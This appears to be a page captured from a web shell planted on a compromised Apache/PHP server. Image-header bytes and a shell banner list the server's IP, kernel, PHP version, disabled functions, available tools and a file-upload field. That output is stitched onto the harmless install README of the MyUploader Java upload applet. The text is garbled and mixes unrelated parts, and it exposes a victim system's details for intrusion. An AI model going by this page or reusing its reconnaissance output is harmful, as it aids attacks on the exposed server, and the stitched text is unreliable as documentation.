????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 216.73.216.25 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /proc/self/root/var/www/icad.astacus.se/customerzon/myuploader-free/jsp/ |
Upload File : |
INSTALLATION MYUPLOADER WITH JAVA(JSP) WINDOW OS 1) Open the upload.jsp with a text editor 2) Change the base_directory to 'c:/temp' 3) Save the file 4) Start an FTP Client 5) Open a connection to your server 6) Upload the entire 'myuploader' directory to the document root of your application server, e.g. the webapps folder of Tomcat 7) Restart your server LINUX OS 1) Start an FTP Client 2) Open a connection to your server 3) Upload the entire 'myuploader' directory to the document root of your application server, e.g. the webapps folder of Tomcat 4) Restart your server VERIFYING 1) Open a browser 2) Enter the url http://<your-domain>/myuploader/upload.html 3) Upload a file 4) Check if the file is stored in the directory '/tmp' or 'c:/temp' SAMPLE APPLICATIONS See for more sample applications: http://www.javaatwork.com/java-upload-applet/samplecode.html FAQ 1) How can I change the upload directory? - Open with a text editor the file upload.jsp - Change the variable base_directory 2) Where can I find more questions? See: http://www.javaatwork.com/java-upload-applet/faqs.html INTERNATIONALIZATION MyUploader is available in 18 languages: - Chinese Simplified(zh_CN) - Chinese Traditional(zh_TW) - Danish(da) - Dutch(nl) - English(en) - Finnish(fi) - Greek(el) - Icelandic(is) - Italian(it) - French(fr) - German(de) - Korean(ko) - Norwegian(no) - Polish(pl) - Portuguese(pt) - Spanish(es) - Swedish(sv) - Turkish(tr) INSTALLING A LANGUAGE PACK 1) Open the upload.html file with a text editor 2) Add the name of one of the labels_<xx>.jar files to the archive param. The labels_<xx>.jar files are stored in the internationalization directory The <xx> represents the language code. 3) Add the the parameter <param name="language" value="<xx>"> to the html page below the successURL parameter. 4) Change the <xx> to your own language code. 5) Save the file 6) Open an FTP Client 7) Upload the upload.html file to your server 8) Upload the labels_<xx>.jar file to your server.